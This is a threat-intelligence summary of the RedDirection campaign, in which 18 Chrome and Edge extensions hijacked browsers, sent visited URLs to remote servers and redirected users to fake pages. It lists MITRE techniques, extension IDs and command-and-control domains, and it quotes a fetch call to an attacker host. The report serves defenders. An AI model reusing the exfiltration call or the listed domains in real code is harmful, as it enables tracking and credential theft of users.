The RedDirection campaign revealed a network of 18 malicious browser extensions across Chrome and Edge that infected over 2.3 million users by hijacking browsers while providing legitimate functionality. These extensions exploited trust signals such as verified badges and featured placements to silently deploy malware through updates and enable persistent surveillance and redirection attacks. #RedDirection #ColorPicker #BrowserHijacking
Keypoints
- A single “verified” Chrome extension called Color Picker was found to be part of a larger campaign involving 18 malicious extensions spanning Chrome and Edge.
- The RedDirection campaign infected over 2.3 million users by hijacking their browser activity and sending visited URLs to remote servers for tracking and redirection.
- Extensions initially appeared legitimate and only introduced malware through silent updates, evading detection by Google and Microsoft’s review processes.
- The malicious extensions posed as popular tools such as emoji keyboards, video speed controllers, VPN proxies, and weather apps to gain user trust.
- Each extension used its own command and control subdomain while operating under a centralized attack infrastructure to maintain persistence and control.
- The campaign utilized browser hijacking techniques to redirect users to fake pages, enabling credential theft and malware distribution without phishing or social engineering.
- This incident exposes systemic marketplace security failures, demonstrating the weaponization of trust signals like verification badges and featured placements.
MITRE Techniques
- [T1189] Drive-by Compromise – The extensions silently installed malicious updates that hijacked user browsers without requiring phishing or user interaction (“Due to how Google and Microsoft handle browser extension updates, these malicious versions auto-installed silently”).
- [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious background service workers in browser extensions monitored tab activity and sent browsing URLs to attacker servers (“code that monitors all tab activity… sends your current URL to remote server”).
- [T1071.001] Application Layer Protocol: Web Protocols – Extensions communicated with command and control servers over HTTPS to receive redirect URLs and send user data (“fetch(‘https://admitclick.net/api…?’)”).
- [T1566.001] Phishing: Spearphishing Link – Redirecting users to fake login and update pages constitutes a form of phishing through browser redirection (“redirects you to a convincing fake page claiming you need to download a ‘critical Zoom update’”).
Indicators of Compromise
- [Extension IDs] Malicious browser extensions identified by their unique IDs in Chrome and Edge stores, e.g., Chrome: “kgmeffmlnkfnjpgmdndccklfigfhajen” (Emoji keyboard online), Edge: “jjdajogomggcjifnjgkpghcijgkbcjdi” (Unlock TikTok).
- [Network Domains] Command and control subdomains used by the extensions include “admitclick.net”, “click.videocontrolls.com”, “c.undiscord.com”, among others linked to the campaign infrastructure.